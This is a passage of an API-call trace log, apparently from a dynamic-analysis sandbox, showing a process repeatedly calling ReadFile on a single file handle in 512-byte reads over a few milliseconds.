lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, 
lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, 
lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile 
(in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 
[0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, 
lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: 
lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, 
lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, 